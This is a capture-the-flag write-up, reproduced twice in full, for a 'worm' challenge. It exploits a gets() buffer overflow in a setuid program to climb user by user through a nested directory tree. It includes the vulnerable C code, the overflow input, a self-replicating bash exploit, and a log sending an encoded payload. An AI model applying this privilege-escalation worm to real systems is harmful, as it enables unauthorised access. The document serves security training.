# worm 2

> Note: The original challenge had an unintended solution ?, so this is the  
> patched version

Write a worm and pwn my system :)

```  
nc 35.188.197.160 1002  
```

Attachments: `worm2.zip`

## Overview

After connecting the server, we this:

```  
$ nc 35.188.197.160 1002  
Send the output of: hashcash -mb26 5qB3LV9O/rHt8dQ9  
1:26:210613:5qb3lv9o/rht8dq9::obR0I0xtrnii7Z7N:3fgTk  
warning: commands will be executed using /bin/sh  
job 153 at Sun Jun 13 18:27:00 2021  
Creating network "64d81a00b78f2c0d0e179a8992e2057b_default" with the default
driver  
Creating 64d81a00b78f2c0d0e179a8992e2057b_app_run ...  
Creating 64d81a00b78f2c0d0e179a8992e2057b_app_run ... done  
Adding group `user1' (GID 1000) ...  
Done.  
Adding group `user2' (GID 1001) ...  
Done.  
Adding group `user3' (GID 1002) ...  
Done.  
Adding group `user4' (GID 1003) ...  
Done.  
Adding group `user5' (GID 1004) ...  
Done.  
Adding group `user6' (GID 1005) ...  
Done.  
Adding group `user7' (GID 1006) ...  
Done.  
Adding group `user8' (GID 1007) ...  
Done.  
Adding group `user9' (GID 1008) ...  
Done.  
Adding group `user10' (GID 1009) ...  
Done.  
[*] Compiling key 2 ...  
[*] Done  
[*] Compiling key 3 ...  
[*] Done  
[*] Compiling key 4 ...  
[*] Done  
[*] Compiling key 5 ...  
[*] Done  
[*] Compiling key 6 ...  
[*] Done  
[*] Compiling key 7 ...  
[*] Done  
[*] Compiling key 8 ...  
[*] Done  
[*] Compiling key 9 ...  
[*] Done  
[*] Compiling key 10 ...  
[*] Done  
[*] Building tree with 1023 nodes ...  
[*] Planting flag in a random leaf node ...  
[+] Ready  
[*] You now have a shell!  
[*] Please enter your exploit below (max 512 chars):  
```

On the remote server, we only get to execute one command non-interactively.
You  
can set up the challenge locally to test though:

We start off as `user1` in the root directory.  
If we `cd` to `/room0`, we see:  
```sh  
user1@14f2437dee35:/room0$ ls -lah  
total 36K  
dr-xr-x--- 4 user1 user2 4.0K May 15 01:26 .  
drwxr-xr-x 1 root  root  4.0K May 15 01:26 ..  
-r-sr-x--- 1 user2 user1  17K May 15 01:26 key  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 room0  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 room1  
```

If we try `cd room0` or `cd room1`, we get `Permission denied`. Luckily, the  
`key` executable is owned by `user2` and has the `setuid` bit set. Running  
`./key`, we get:

```sh  
user1@14f2437dee35:/room0$ ./key  
Name: idk  
Unauthorized :(  
```

Here's the relevant code from `key.c`:  
```c  
typedef struct {  
   char name[32];  
   char password[32];  
} User;

void auth() {  
   printf("Authenticating ...\n");  
   assert(setuid(ID) == 0);  
   assert(setgid(ID) == 0);  
   system("/bin/bash");  
}

int main() {  
   User user;

   printf("Name: ");  
   gets(user.name);

   if (strncmp(user.password, "p4ssw0rd", 8) == 0) {  
       auth();  
   } else {  
       printf("Unauthorized :(\n");  
   }  
return 0;  
}  
```

There's clearly a BOF at `gets(user.name)`, so we can type in 32 characters
and  
overflow into `user.password` to set it to `p4ssw0rd`.

```sh  
user1@14f2437dee35:/room0$ ./key  
Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp4ssw0rd  
Authenticating ...  
user2@14f2437dee35:/room0$ id  
uid=1001(user2) gid=1001(user2) groups=1001(user2),1000(user1)  
```

Now we're `user2` and can `cd` to `room0` or `room1`. In `/room0/room1`, we
see  
nearly the exact same thing:  
```sh  
user2@14f2437dee35:/room0/room1$ ls -lah  
total 36K  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 .  
dr-xr-x--- 4 user1 user2 4.0K May 15 01:26 ..  
-r-sr-x--- 1 user3 user2  17K May 15 01:26 key  
dr-xr-x--- 4 user3 user4 4.0K May 15 01:26 room0  
dr-xr-x--- 4 user3 user4 4.0K May 15 01:26 room1  
```

Again if we try to `cd room0` or `cd room1`, we get `Permission denied`, so we  
have to use the `key`.

We know that `MAX_DEPTH = 10` so directory structure forms a full binary tree,  
and the flag is located in a random leaf node.  
```python  
def plant_flag():  
   os.chdir("room0")  
   while len(os.listdir()) > 0:  
       os.chdir(f"room{random.randint(0, 1)}")

   os.rename("/flag.txt", "./flag.txt")  
```

Finally, our entire exploit must be less than 512 characters (external  
networking is disabled so we can't download any additional payloads):  
```bash  
echo "[*] You now have a shell!"  
echo "[*] Please enter your exploit below (max 512 chars):"  
read -n 512 cmd  
exec su user1 -c "$cmd" 0<&-  
```

## Solution

Do depth-first search with a self-replicating exploit:  
```bash  
echo -n . 1>&2

if [ -f "flag.txt" ]; then  
   cat flag.txt 1>&2  
fi

if [ -f "key" ]; then  
   payload=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp4ssw0rd  
   (echo $payload && echo "cd room0 && exec bash /tmp/solve.sh") | ./key > /dev/null  
   (echo $payload && echo "cd room1 && exec bash /tmp/solve.sh") | ./key > /dev/null  
fi  
```

Output:  
```sh  
$ python3 client.py  
[x] Opening connection to localhost on port 1024  
[x] Opening connection to localhost on port 1024: Trying 127.0.0.1  
[+] Opening connection to localhost on port 1024: Done  
[*] Solving PoW ...  
[DEBUG] Received 0x34 bytes:  
   b'Send the output of: hashcash -mb26 ehmCMcCi7SHUqWes\n'  
[+] Solved PoW  
[DEBUG] Sent 0x35 bytes:  
   b'1:26:210515:ehmcmcci7shuqwes::FmB8btNpTIqC54om:2Bd/y\n'  
[DEBUG] Sent 0x150 bytes:  
   b'cd /tmp && echo -n H4sIAAwmn2AC/5WPTQrCMBSE9z3FEKTookkr7sSC5xAXMT+mmCalibUFD2+tCrpSZznvfcOMEsYjc6AoynSZJJXGDpkG0ZYfaewjwX6NaJRLMErwiNflQejqDTqp4fO/4YP1XG62X9SsQrjkrZygubqXmj1ZpCkmgwiJ1vs6n5xeCRx4MGCxbljwtlM0GLLAFZSNPVCCSdUxd7b2l9Ti/9Rx+g33VaPsPwEAAA== | base64 -d > solve.sh.gz && gzip -d solve.sh.gz && cd /room0 && bash /tmp/solve.sh\n'  
[*] Switching to interactive mode  
warning: commands will be executed using /bin/sh  
job 20 at Sat May 15 01:44:00 2021  
Creating network "9a97ccccc44d5152637380a682ac72ea_default" with the default
driver  
Creating 9a97ccccc44d5152637380a682ac72ea_app_run ...  
Creating 9a97ccccc44d5152637380a682ac72ea_app_run ... done  
Adding group `user1' (GID 1000) ...  
Done.  
Adding group `user2' (GID 1001) ...  
Done.  
Adding group `user3' (GID 1002) ...  
Done.  
Adding group `user4' (GID 1003) ...  
Done.  
Adding group `user5' (GID 1004) ...  
Done.  
Adding group `user6' (GID 1005) ...  
Done.  
Adding group `user7' (GID 1006) ...  
Done.  
Adding group `user8' (GID 1007) ...  
Done.  
Adding group `user9' (GID 1008) ...  
Done.  
Adding group `user10' (GID 1009) ...  
Done.  
[*] Compiling key 2 ...  
[*] Done  
[*] Compiling key 3 ...  
[*] Done  
[*] Compiling key 4 ...  
[*] Done  
[*] Compiling key 5 ...  
[*] Done  
[*] Compiling key 6 ...  
[*] Done  
[*] Compiling key 7 ...  
[*] Done  
[*] Compiling key 8 ...  
[*] Done  
[*] Compiling key 9 ...  
[*] Done  
[*] Compiling key 10 ...  
[*] Done  
[*] Building tree with 1023 nodes ...  
[*] Planting flag in a random leaf node ...  
[+] Ready  
[*] You now have a shell!  
[*] Please enter your exploit below (max 512 chars):  
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................CCC{I_c4nt_b3l1ev3_1_f0rg0t_t0_cl0s3_std1n}  
.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[*]
Got EOF while reading in interactive  
```  

Original writeup
(https://github.com/qxxxb/ctf_challenges/blob/master/2021/ccc/pwn/worm2/solve).# worm 2

> Note: The original challenge had an unintended solution ?, so this is the  
> patched version

Write a worm and pwn my system :)

```  
nc 35.188.197.160 1002  
```

Attachments: `worm2.zip`

## Overview

After connecting the server, we this:

```  
$ nc 35.188.197.160 1002  
Send the output of: hashcash -mb26 5qB3LV9O/rHt8dQ9  
1:26:210613:5qb3lv9o/rht8dq9::obR0I0xtrnii7Z7N:3fgTk  
warning: commands will be executed using /bin/sh  
job 153 at Sun Jun 13 18:27:00 2021  
Creating network "64d81a00b78f2c0d0e179a8992e2057b_default" with the default
driver  
Creating 64d81a00b78f2c0d0e179a8992e2057b_app_run ...  
Creating 64d81a00b78f2c0d0e179a8992e2057b_app_run ... done  
Adding group `user1' (GID 1000) ...  
Done.  
Adding group `user2' (GID 1001) ...  
Done.  
Adding group `user3' (GID 1002) ...  
Done.  
Adding group `user4' (GID 1003) ...  
Done.  
Adding group `user5' (GID 1004) ...  
Done.  
Adding group `user6' (GID 1005) ...  
Done.  
Adding group `user7' (GID 1006) ...  
Done.  
Adding group `user8' (GID 1007) ...  
Done.  
Adding group `user9' (GID 1008) ...  
Done.  
Adding group `user10' (GID 1009) ...  
Done.  
[*] Compiling key 2 ...  
[*] Done  
[*] Compiling key 3 ...  
[*] Done  
[*] Compiling key 4 ...  
[*] Done  
[*] Compiling key 5 ...  
[*] Done  
[*] Compiling key 6 ...  
[*] Done  
[*] Compiling key 7 ...  
[*] Done  
[*] Compiling key 8 ...  
[*] Done  
[*] Compiling key 9 ...  
[*] Done  
[*] Compiling key 10 ...  
[*] Done  
[*] Building tree with 1023 nodes ...  
[*] Planting flag in a random leaf node ...  
[+] Ready  
[*] You now have a shell!  
[*] Please enter your exploit below (max 512 chars):  
```

On the remote server, we only get to execute one command non-interactively.
You  
can set up the challenge locally to test though:

We start off as `user1` in the root directory.  
If we `cd` to `/room0`, we see:  
```sh  
user1@14f2437dee35:/room0$ ls -lah  
total 36K  
dr-xr-x--- 4 user1 user2 4.0K May 15 01:26 .  
drwxr-xr-x 1 root root 4.0K May 15 01:26 ..  
-r-sr-x--- 1 user2 user1 17K May 15 01:26 key  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 room0  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 room1  
```

If we try `cd room0` or `cd room1`, we get `Permission denied`. Luckily, the  
`key` executable is owned by `user2` and has the `setuid` bit set. Running  
`./key`, we get:

```sh  
user1@14f2437dee35:/room0$ ./key  
Name: idk  
Unauthorized :(  
```

Here's the relevant code from `key.c`:  
```c  
typedef struct {  
char name[32];  
char password[32];  
} User;

void auth() {  
printf("Authenticating ...\n");  
assert(setuid(ID) == 0);  
assert(setgid(ID) == 0);  
system("/bin/bash");  
}

int main() {  
User user;

printf("Name: ");  
gets(user.name);

if (strncmp(user.password, "p4ssw0rd", 8) == 0) {  
auth();  
} else {  
printf("Unauthorized :(\n");  
}  
return 0;  
}  
```

There's clearly a BOF at `gets(user.name)`, so we can type in 32 characters
and  
overflow into `user.password` to set it to `p4ssw0rd`.

```sh  
user1@14f2437dee35:/room0$ ./key  
Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp4ssw0rd  
Authenticating ...  
user2@14f2437dee35:/room0$ id  
uid=1001(user2) gid=1001(user2) groups=1001(user2),1000(user1)  
```

Now we're `user2` and can `cd` to `room0` or `room1`. In `/room0/room1`, we
see  
nearly the exact same thing:  
```sh  
user2@14f2437dee35:/room0/room1$ ls -lah  
total 36K  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 .  
dr-xr-x--- 4 user1 user2 4.0K May 15 01:26 ..  
-r-sr-x--- 1 user3 user2 17K May 15 01:26 key  
dr-xr-x--- 4 user3 user4 4.0K May 15 01:26 room0  
dr-xr-x--- 4 user3 user4 4.0K May 15 01:26 room1  
```

Again if we try to `cd room0` or `cd room1`, we get `Permission denied`, so we  
have to use the `key`.

We know that `MAX_DEPTH = 10` so directory structure forms a full binary tree,  
and the flag is located in a random leaf node.  
```python  
def plant_flag():  
os.chdir("room0")  
while len(os.listdir()) > 0:  
os.chdir(f"room{random.randint(0, 1)}")

os.rename("/flag.txt", "./flag.txt")  
```

Finally, our entire exploit must be less than 512 characters (external  
networking is disabled so we can't download any additional payloads):  
```bash  
echo "[*] You now have a shell!"  
echo "[*] Please enter your exploit below (max 512 chars):"  
read -n 512 cmd  
exec su user1 -c "$cmd" 0<&-  
```

## Solution

Do depth-first search with a self-replicating exploit:  
```bash  
echo -n . 1>&2

if [ -f "flag.txt" ]; then  
cat flag.txt 1>&2  
fi

if [ -f "key" ]; then  
payload=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp4ssw0rd  
(echo $payload && echo "cd room0 && exec bash /tmp/solve.sh") | ./key > /dev/null  
(echo $payload && echo "cd room1 && exec bash /tmp/solve.sh") | ./key > /dev/null  
fi  
```

Output:  
```sh  
$ python3 client.py  
[x] Opening connection to localhost on port 1024  
[x] Opening connection to localhost on port 1024: Trying 127.0.0.1  
[+] Opening connection to localhost on port 1024: Done  
[*] Solving PoW ...  
[DEBUG] Received 0x34 bytes:  
b'Send the output of: hashcash -mb26 ehmCMcCi7SHUqWes\n'  
[+] Solved PoW  
[DEBUG] Sent 0x35 bytes:  
b'1:26:210515:ehmcmcci7shuqwes::FmB8btNpTIqC54om:2Bd/y\n'  
[DEBUG] Sent 0x150 bytes:  
b'cd /tmp && echo -n H4sIAAwmn2AC/5WPTQrCMBSE9z3FEKTookkr7sSC5xAXMT+mmCalibUFD2+tCrpSZznvfcOMEsYjc6AoynSZJJXGDpkG0ZYfaewjwX6NaJRLMErwiNflQejqDTqp4fO/4YP1XG62X9SsQrjkrZygubqXmj1ZpCkmgwiJ1vs6n5xeCRx4MGCxbljwtlM0GLLAFZSNPVCCSdUxd7b2l9Ti/9Rx+g33VaPsPwEAAA== | base64 -d > solve.sh.gz && gzip -d solve.sh.gz && cd /room0 && bash /tmp/solve.sh\n'  
[*] Switching to interactive mode  
warning: commands will be executed using /bin/sh  
job 20 at Sat May 15 01:44:00 2021  
Creating network "9a97ccccc44d5152637380a682ac72ea_default" with the default
driver  
Creating 9a97ccccc44d5152637380a682ac72ea_app_run ...  
Creating 9a97ccccc44d5152637380a682ac72ea_app_run ... done  
Adding group `user1' (GID 1000) ...  
Done.  
Adding group `user2' (GID 1001) ...  
Done.  
Adding group `user3' (GID 1002) ...  
Done.  
Adding group `user4' (GID 1003) ...  
Done.  
Adding group `user5' (GID 1004) ...  
Done.  
Adding group `user6' (GID 1005) ...  
Done.  
Adding group `user7' (GID 1006) ...  
Done.  
Adding group `user8' (GID 1007) ...  
Done.  
Adding group `user9' (GID 1008) ...  
Done.  
Adding group `user10' (GID 1009) ...  
Done.  
[*] Compiling key 2 ...  
[*] Done  
[*] Compiling key 3 ...  
[*] Done  
[*] Compiling key 4 ...  
[*] Done  
[*] Compiling key 5 ...  
[*] Done  
[*] Compiling key 6 ...  
[*] Done  
[*] Compiling key 7 ...  
[*] Done  
[*] Compiling key 8 ...  
[*] Done  
[*] Compiling key 9 ...  
[*] Done  
[*] Compiling key 10 ...  
[*] Done  
[*] Building tree with 1023 nodes ...  
[*] Planting flag in a random leaf node ...  
[+] Ready  
[*] You now have a shell!  
[*] Please enter your exploit below (max 512 chars):  
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................CCC{I_c4nt_b3l1ev3_1_f0rg0t_t0_cl0s3_std1n}  
.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[*]
Got EOF while reading in interactive  
```  

Original writeup
(https://github.com/qxxxb/ctf_challenges/blob/master/2021/ccc/pwn/worm2/solve).